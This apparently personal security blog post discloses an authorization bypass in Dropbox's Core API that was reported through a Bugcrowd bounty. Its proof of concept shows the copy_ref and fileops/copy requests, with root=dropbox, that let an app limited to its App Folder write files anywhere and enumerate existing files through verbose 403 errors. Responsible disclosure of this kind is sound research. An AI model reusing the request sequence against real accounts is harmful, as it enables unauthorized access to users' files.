Pranav Hivarekar's Security Blog

REST-API Lover | Security Researcher | API Coder | Ambivert | GET /noob

Home     About      Favorite Books      Join Security Thursday     

DropBox's Critical Bug - App having ONLY access to `App folder` being able to post and enumerate files in/of any folder

Description

Dropbox offers two Api's ...

  1. Core Api (https://www.dropbox.com/developers/core)
  2. Business Api (https://www.dropbox.com/developers/business)

Both the Api's have different permission models i.e different and distinct scope permissions are available for both the apis.

I was testing the Core Api and I found pretty bad authorization bypass. Let me explain what was it ?
Also, I would like to add that this bug was open for almost 2 years from the initial launch of the api.

DropBox's Core Api offers different scope permissions ...
Refer (https://www.dropbox.com/developers/reference/devguide)

App Folder scope got my attention

A dedicated folder named after your app is created within the Apps folder of a user's Dropbox. Your app gets read and write access to this folder only and users can provide content to your app by moving files into this folder.
In simple words, an app can access only the folder which is created by itself. It won't have any access to other folders or root folder. So, an app can post/delete files ONLY in it's folder.
eg. If Pranav's app has created Pranav's app folder then app can access ONLY that folder and nothing else.

But I was able to circumvent this permission model and I was able to post files in any folder of my choice of dropbox.

Proof Of Concept

This is completely logical attack ...
Two steps were required to completely post files in other folders.

  1. Create a file in app's respective App Folder.
  2. Create file's copy reference.
  3. Copy file to any folder using copy reference.

Request :
Creating copy reference of test.png which is already uploaded in App Folder

(Making copy_ref --->https://www.dropbox.com/developers/core/docs#copy_ref)

GET https://api.dropbox.com/1/copy_ref/auto/test.png?access_token=redacted

Response :

{"expires": "Sun, 30 Apr 2045 07:23:24 +0000", "copy_ref": "JipjFzJqMDZrdGhqNTRnZA"}

Copy reference successfully created.


Request :
Copying file test.png using copy reference to any folder.

(Copying file to a new location ---> https://www.dropbox.com/developers/core/docs#fileops-copy)

POST https://api.dropbox.com/1/fileops/copy?root=dropbox&from_copy_ref=JipjFzJqMDZrdGhqNTRnZA&to_path=/hacked.txt&access_token=redacted

Response :

{"rev": "206262a6317", "thumb_exists": false, "path": "/hacked.txt", "is_dir": false, "client_mtime": "Fri, 08 May 2015 06:03:20 +0000", "icon": "page_white_text", "bytes": 15110, "modified": "Fri, 08 May 2015 07:41:19 +0000", "size": "14.8 KB", "root": "app_folder", "mime_type": "text/plain", "revision": 518}

File got successfully copied to 'root' directory.


Vulnerable parameter is root=dropbox. Here, auto means it will directly point to the App Folder but dropbox means it starts pointing from root.

If file is already present with the name then it gave verbose errors. This allowed me to enumerate all files present in the dropbox.
eg. If test.png is already present in the root directory and we try to post file with same name then it will give verbose errors and Status 403 Forbidden which is a clear indication that file exists.


I successfully submitted this bug to Dropbox's Flex which was hosted on Bugcrowd and won first prize.

Dropbox flex

Video Proof Of Concept

Special Thanks

First I would like to thank Philippe Harewood (http://philippeharewood.com/) for motivating all from his research on Facebook's Api.

Later, I would like to convey my thanks to Bugcrowd for their supportiveness they showed towards me.

And lately, I would like to thank DropBox for successfully hosting their Flex Bounty. :-)

Cheers all- round ! :-)